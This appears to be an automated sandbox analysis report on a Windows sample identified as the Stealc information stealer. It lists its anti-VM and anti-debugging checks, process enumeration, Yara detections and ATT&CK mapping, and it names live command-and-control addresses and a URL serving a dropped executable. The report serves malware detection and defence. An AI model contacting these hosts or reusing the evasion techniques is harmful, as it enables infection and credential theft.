Source: Amcache.hve.5.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.5.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.5.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.5.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.5.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.5.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: LXS5itpTK7.exe, 00000000.00000002.4483550153.00000000005CE000.00000004.00000020.00020000.00000000.sdmp, LXS5itpTK7.exe, 00000000.00000002.4483550153.000000000062C000.00000004.00000020.00020000.00000000.sdmp, B5F8.tmp.exe, 00000002.00000002.2358508594.0000000000970000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.5.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.5.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.5.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.5.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.5.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.5.dr	Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.5.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.5.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.5.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.5.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.5.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.5.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.5.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: B5F8.tmp.exe, 00000002.00000002.2358508594.000000000090E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: Amcache.hve.5.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.5.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.5.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.5.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.5.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.5.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.5.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: B5F8.tmp.exe, 00000002.00000002.2358508594.0000000000941000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWh2
Source: Amcache.hve.5.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Users\user\AppData\Local\Temp\B5F8.tmp.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\LXS5itpTK7.exe

Code function: 0_2_0042A3D3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_0042A3D3

Source: C:\Users\user\AppData\Local\Temp\B5F8.tmp.exe

Code function: 2_2_00404980 VirtualProtect 00000000,00000004,00000100,?

2_2_00404980

Source: C:\Users\user\Desktop\LXS5itpTK7.exe

Code function: 0_2_0041EC5E LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_0041EC5E

Source: C:\Users\user\Desktop\LXS5itpTK7.exe	Code function: 0_2_0042FE5F mov eax, dword ptr fs:[00000030h]	0_2_0042FE5F
Source: C:\Users\user\Desktop\LXS5itpTK7.exe	Code function: 0_2_00540083 push dword ptr fs:[00000030h]	0_2_00540083
Source: C:\Users\user\Desktop\LXS5itpTK7.exe	Code function: 0_2_021600C6 mov eax, dword ptr fs:[00000030h]	0_2_021600C6
Source: C:\Users\user\Desktop\LXS5itpTK7.exe	Code function: 0_2_0213092B mov eax, dword ptr fs:[00000030h]	0_2_0213092B
Source: C:\Users\user\Desktop\LXS5itpTK7.exe	Code function: 0_2_02130D90 mov eax, dword ptr fs:[00000030h]	0_2_02130D90
Source: C:\Users\user\AppData\Local\Temp\B5F8.tmp.exe	Code function: 2_2_004263C0 mov eax, dword ptr fs:[00000030h]	2_2_004263C0
Source: C:\Users\user\AppData\Local\Temp\B5F8.tmp.exe	Code function: 2_2_008D6D0A push dword ptr fs:[00000030h]	2_2_008D6D0A
Source: C:\Users\user\AppData\Local\Temp\B5F8.tmp.exe	Code function: 2_2_021C6627 mov eax, dword ptr fs:[00000030h]	2_2_021C6627
Source: C:\Users\user\AppData\Local\Temp\B5F8.tmp.exe	Code function: 2_2_021A092B mov eax, dword ptr fs:[00000030h]	2_2_021A092B
Source: C:\Users\user\AppData\Local\Temp\B5F8.tmp.exe	Code function: 2_2_021A0D90 mov eax, dword ptr fs:[00000030h]	2_2_021A0D90

Source: C:\Users\user\Desktop\LXS5itpTK7.exe

Code function: 0_2_0043BBC1 GetProcessHeap,

0_2_0043BBC1

Source: C:\Users\user\Desktop\LXS5itpTK7.exe	Code function: 0_2_0042A3D3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0042A3D3
Source: C:\Users\user\Desktop\LXS5itpTK7.exe	Code function: 0_2_004104D3 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_004104D3
Source: C:\Users\user\Desktop\LXS5itpTK7.exe	Code function: 0_2_00410666 SetUnhandledExceptionFilter,	0_2_00410666
Source: C:\Users\user\Desktop\LXS5itpTK7.exe	Code function: 0_2_0040F911 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_0040F911
Source: C:\Users\user\Desktop\LXS5itpTK7.exe	Code function: 0_2_0215A63A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0215A63A
Source: C:\Users\user\Desktop\LXS5itpTK7.exe	Code function: 0_2_0214073A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0214073A
Source: C:\Users\user\Desktop\LXS5itpTK7.exe	Code function: 0_2_0213FB78 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_0213FB78
Source: C:\Users\user\Desktop\LXS5itpTK7.exe	Code function: 0_2_021408CD SetUnhandledExceptionFilter,	0_2_021408CD
Source: C:\Users\user\AppData\Local\Temp\B5F8.tmp.exe	Code function: 2_2_021C9A10 SetUnhandledExceptionFilter,	2_2_021C9A10
Source: C:\Users\user\AppData\Local\Temp\B5F8.tmp.exe	Code function: 2_2_021C7E31 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_021C7E31
Source: C:\Users\user\AppData\Local\Temp\B5F8.tmp.exe	Code function: 2_2_021C784F memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_021C784F

Source: C:\Users\user\AppData\Local\Temp\B5F8.tmp.exe

Memory protected: page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match

File source: Process Memory Space: B5F8.tmp.exe PID: 4416, type: MEMORYSTR

Searches for specific processes (likely to inject)

Source: C:\Users\user\AppData\Local\Temp\B5F8.tmp.exe	Code function: 2_2_004246C0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,Process32Next,CloseHandle,	2_2_004246C0
Source: C:\Users\user\AppData\Local\Temp\B5F8.tmp.exe	Code function: 2_2_021C4897 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,Process32Next,CloseHandle,	2_2_021C4897
Source: C:\Users\user\AppData\Local\Temp\B5F8.tmp.exe	Code function: 2_2_021C4927 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,Process32Next,CloseHandle,	2_2_021C4927

Source: C:\Users\user\Desktop\LXS5itpTK7.exe

Process created: C:\Users\user\AppData\Local\Temp\B5F8.tmp.exe "C:\Users\user\AppData\Local\Temp\B5F8.tmp.exe"

Jump to behavior

Source: C:\Users\user\Desktop\LXS5itpTK7.exe

Code function: 0_2_0041077B cpuid

0_2_0041077B

Source: C:\Users\user\Desktop\LXS5itpTK7.exe	Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	0_2_0043B00A
Source: C:\Users\user\Desktop\LXS5itpTK7.exe	Code function: GetLocaleInfoW,	0_2_004351C0
Source: C:\Users\user\Desktop\LXS5itpTK7.exe	Code function: EnumSystemLocalesW,	0_2_0043B2CD
Source: C:\Users\user\Desktop\LXS5itpTK7.exe	Code function: EnumSystemLocalesW,	0_2_0043B282
Source: C:\Users\user\Desktop\LXS5itpTK7.exe	Code function: EnumSystemLocalesW,	0_2_0043B368
Source: C:\Users\user\Desktop\LXS5itpTK7.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	0_2_0043B3F5
Source: C:\Users\user\Desktop\LXS5itpTK7.exe	Code function: GetLocaleInfoW,	0_2_0043B645
Source: C:\Users\user\Desktop\LXS5itpTK7.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	0_2_0043B76E
Source: C:\Users\user\Desktop\LXS5itpTK7.exe	Code function: GetLocaleInfoW,	0_2_0043B875
Source: C:\Users\user\Desktop\LXS5itpTK7.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	0_2_0043B942
Source: C:\Users\user\Desktop\LXS5itpTK7.exe	Code function: EnumSystemLocalesW,	0_2_00434DCD
Source: C:\Users\user\Desktop\LXS5itpTK7.exe	Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	0_2_0216B271
Source: C:\Users\user\Desktop\LXS5itpTK7.exe	Code function: EnumSystemLocalesW,	0_2_02165034
Source: C:\Users\user\Desktop\LXS5itpTK7.exe	Code function: GetLocaleInfoW,	0_2_02165427
Source: C:\Users\user\Desktop\LXS5itpTK7.exe	Code function: EnumSystemLocalesW,	0_2_0216B4E9
Source: C:\Users\user\Desktop\LXS5itpTK7.exe	Code function: EnumSystemLocalesW,	0_2_0216B534
Source: C:\Users\user\Desktop\LXS5itpTK7.exe	Code function: EnumSystemLocalesW,	0_2_0216B5CF
Source: C:\Users\user\Desktop\LXS5itpTK7.exe	Code function: GetLocaleInfoW,	0_2_0216BADC
Source: C:\Users\user\Desktop\LXS5itpTK7.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	0_2_0216BBA9
Source: C:\Users\user\Desktop\LXS5itpTK7.exe	Code function: GetLocaleInfoW,	0_2_0216B8A3
Source: C:\Users\user\Desktop\LXS5itpTK7.exe	Code function: GetLocaleInfoW,	0_2_0216B8AC
Source: C:\Users\user\Desktop\LXS5itpTK7.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	0_2_0216B9D5
Source: C:\Users\user\AppData\Local\Temp\B5F8.tmp.exe	Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,	2_2_021C2F67

Source: C:\Users\user\AppData\Local\Temp\B5F8.tmp.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B5F8.tmp.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\B5F8.tmp.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B5F8.tmp.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior

Source: C:\Users\user\Desktop\LXS5itpTK7.exe

Code function: 0_2_004103CD GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_004103CD

Source: C:\Users\user\AppData\Local\Temp\B5F8.tmp.exe

Code function: 2_2_004229E0 GetProcessHeap,HeapAlloc,GetUserNameA,

2_2_004229E0

Source: C:\Users\user\AppData\Local\Temp\B5F8.tmp.exe

Code function: 2_2_021C2E17 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,

2_2_021C2E17

Source: C:\Users\user\Desktop\LXS5itpTK7.exe

Code function: 0_2_004163EA GetVersionExW,Concurrency::details::platform::InitializeSystemFunctionPointers,Concurrency::details::WinRT::Initialize,__CxxThrowException@8,

0_2_004163EA

Source: Amcache.hve.5.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.5.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.5.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.5.dr	Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Yara detected Stealc

Source: Yara match	File source: 2.2.B5F8.tmp.exe.21a0e67.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.B5F8.tmp.exe.2360000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.B5F8.tmp.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.B5F8.tmp.exe.2360000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.B5F8.tmp.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.B5F8.tmp.exe.21a0e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.2358062136.0000000000540000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2358062136.0000000000596000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.2086429578.0000000002360000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2358508594.000000000090E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2358623419.00000000021A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2358062136.000000000055B000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2358062136.0000000000478000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2358062136.0000000000400000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: B5F8.tmp.exe PID: 4416, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Remote Access Functionality

Yara detected Stealc

Source: Yara match	File source: 2.2.B5F8.tmp.exe.21a0e67.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.B5F8.tmp.exe.2360000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.B5F8.tmp.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.B5F8.tmp.exe.2360000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.B5F8.tmp.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.B5F8.tmp.exe.21a0e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.2358062136.0000000000540000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2358062136.0000000000596000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.2086429578.0000000002360000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2358508594.000000000090E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2358623419.00000000021A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2358062136.000000000055B000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2358062136.0000000000478000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2358062136.0000000000400000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: B5F8.tmp.exe PID: 4416, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Source: C:\Users\user\Desktop\LXS5itpTK7.exe	Code function: 0_2_004218CC Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::InternalContextBase::SwitchOut,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::InternalContextBase::SwitchTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,	0_2_004218CC
Source: C:\Users\user\Desktop\LXS5itpTK7.exe	Code function: 0_2_00420BF6 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext,	0_2_00420BF6
Source: C:\Users\user\Desktop\LXS5itpTK7.exe	Code function: 0_2_02151B33 Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::InternalContextBase::SwitchOut,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::InternalContextBase::SwitchTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,	0_2_02151B33
Source: C:\Users\user\Desktop\LXS5itpTK7.exe	Code function: 0_2_02150E5D Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext,	0_2_02150E5D

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Native API	1 DLL Side-Loading	1 DLL Side-Loading	11 Disable or Modify Tools	OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	12 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 Create Account	111 Process Injection	1 Deobfuscate/Decode Files or Information	LSASS Memory	1 Account Discovery	Remote Desktop Protocol	3 Clipboard Data	21 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	2 Obfuscated Files or Information	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	2 Software Packing	NTDS	44 System Information Discovery	Distributed Component Object Model	Input Capture	114 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	1 Query Registry	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Masquerading	Cached Domain Credentials	31 Security Software Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Virtualization/Sandbox Evasion	DCSync	1 Virtualization/Sandbox Evasion	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	111 Process Injection	Proc Filesystem	12 Process Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	HTML Smuggling	/etc/passwd and /etc/shadow	1 Application Window Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	Dynamic API Resolution	Network Sniffing	1 System Owner/User Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
LXS5itpTK7.exe	37%	ReversingLabs
LXS5itpTK7.exe	38%	Virustotal		Browse
LXS5itpTK7.exe	100%	Avira	HEUR/AGEN.1306978
LXS5itpTK7.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Temp\B5F8.tmp.exe	100%	Avira	HEUR/AGEN.1306978
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\ScreenUpdateSync[1].exe	100%	Avira	HEUR/AGEN.1306978
C:\Users\user\AppData\Local\Temp\B5F8.tmp.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\ScreenUpdateSync[1].exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label	Link
http://92.255.57.89SH/	0%	Avira URL Cloud	safe
http://176.113.115.19/ScreenUpdateSync.exes	0%	Avira URL Cloud	safe
http://92.255.57.89/s	100%	Avira URL Cloud	malware
http://92.255.57.89/45c616e921a794b8.php2bcf3ed6d7050e400	100%	Avira URL Cloud	malware
http://176.113.115.19/ScreenUpdateSync.exeo	0%	Avira URL Cloud	safe
http://92.255.57.89/697b92cb4e247842/sqlite3.dllform-data;	100%	Avira URL Cloud	malware
http://92.255.57.89-	0%	Avira URL Cloud	safe
http://92.255.57.89/45c616e921a794b8.phpSE	100%	Avira URL Cloud	malware
http://176.113.115.19/ScreenUpdateSync.exe	100%	Avira URL Cloud	malware
http://176.113.115.19/ScreenUpdateSync.exe5rjtejk5rytrrSOFTWARE	0%	Avira URL Cloud	safe
http://176.113.115.19/ScreenUpdateSync.exeK	0%	Avira URL Cloud	safe
http://176.113.115.19/h	0%	Avira URL Cloud	safe
http://176.113.115.19/ScreenUpdateSync.exeV	0%	Avira URL Cloud	safe
http://176.113.115.19/ScreenUpdateSync.exez	0%	Avira URL Cloud	safe
http://176.113.115.19/ScreenUpdateSync.exe;	100%	Avira URL Cloud	malware
http://92.255.57.89/45c616e921a794b8.phpkE	100%	Avira URL Cloud	malware
http://92.255.57.89IDBKEC	0%	Avira URL Cloud	safe
http://176.113.115.19/ScreenUpdateSync.exeo	1%	Virustotal		Browse
http://92.255.57.89/45c616e921a794b8.phpsition:	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
post-to-me.com	104.21.56.70	true	false		high

Contacted URLs

Name	Malicious	Reputation
http://92.255.57.89/45c616e921a794b8.php	false	high
https://post-to-me.com/track_prt.php?sub=0&cc=DE	false	high
http://92.255.57.89/	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://post-to-me.com/track_prt.php?sub=&cc=DE	LXS5itpTK7.exe, 00000000.00000002.4483304225.0000000000400000.00000040.00000001.01000000.00000003.sdmp	false		high
http://92.255.57.89/45c616e921a794b8.php2bcf3ed6d7050e400	B5F8.tmp.exe, 00000002.00000002.2358508594.000000000090E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://92.255.57.89	B5F8.tmp.exe, 00000002.00000002.2358508594.000000000090E000.00000004.00000020.00020000.00000000.sdmp, B5F8.tmp.exe, 00000002.00000002.2358062136.0000000000478000.00000040.00000001.01000000.00000006.sdmp	false		high
http://92.255.57.89SH/	B5F8.tmp.exe, 00000002.00000002.2358508594.000000000090E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://176.113.115.19/ScreenUpdateSync.exeo	LXS5itpTK7.exe, 00000000.00000003.2075871383.0000000000641000.00000004.00000020.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://92.255.57.89/s	B5F8.tmp.exe, 00000002.00000002.2358508594.000000000090E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://176.113.115.19/ScreenUpdateSync.exes	LXS5itpTK7.exe, 00000000.00000003.2075871383.0000000000641000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://92.255.57.89-	B5F8.tmp.exe, 00000002.00000002.2358508594.0000000000952000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://92.255.57.89/697b92cb4e247842/sqlite3.dllform-data;	B5F8.tmp.exe, 00000002.00000002.2358062136.00000000004AF000.00000040.00000001.01000000.00000006.sdmp	false	Avira URL Cloud: malware	unknown
http://upx.sf.net	Amcache.hve.5.dr	false		high
http://92.255.57.89/45c616e921a794b8.phpSE	B5F8.tmp.exe, 00000002.00000002.2358508594.0000000000952000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://176.113.115.19/ScreenUpdateSync.exe	LXS5itpTK7.exe, 00000000.00000003.2075871383.0000000000641000.00000004.00000020.00020000.00000000.sdmp, LXS5itpTK7.exe, 00000000.00000002.4483550153.000000000063E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://176.113.115.19/ScreenUpdateSync.exe5rjtejk5rytrrSOFTWARE	LXS5itpTK7.exe, 00000000.00000002.4483304225.0000000000400000.00000040.00000001.01000000.00000003.sdmp	false	Avira URL Cloud: safe	unknown
https://post-to-me.com/track_prt.php?sub=	LXS5itpTK7.exe	false		high
http://176.113.115.19/ScreenUpdateSync.exeK	LXS5itpTK7.exe, 00000000.00000003.2075871383.0000000000641000.00000004.00000020.00020000.00000000.sdmp, LXS5itpTK7.exe, 00000000.00000002.4483550153.000000000063E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://176.113.115.19/h	LXS5itpTK7.exe, 00000000.00000003.2075871383.0000000000641000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://176.113.115.19/ScreenUpdateSync.exeV	LXS5itpTK7.exe, 00000000.00000003.2075871383.0000000000641000.00000004.00000020.00020000.00000000.sdmp, LXS5itpTK7.exe, 00000000.00000002.4483550153.000000000063E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://post-to-me.com/	LXS5itpTK7.exe, 00000000.00000002.4483550153.0000000000611000.00000004.00000020.00020000.00000000.sdmp	false		high
http://176.113.115.19/ScreenUpdateSync.exez	LXS5itpTK7.exe, 00000000.00000003.2075871383.0000000000641000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://176.113.115.19/ScreenUpdateSync.exe;	LXS5itpTK7.exe, 00000000.00000002.4483550153.00000000005CE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://92.255.57.89/45c616e921a794b8.phpkE	B5F8.tmp.exe, 00000002.00000002.2358508594.0000000000952000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://92.255.57.89IDBKEC	B5F8.tmp.exe, 00000002.00000002.2358062136.0000000000478000.00000040.00000001.01000000.00000006.sdmp	false	Avira URL Cloud: safe	unknown
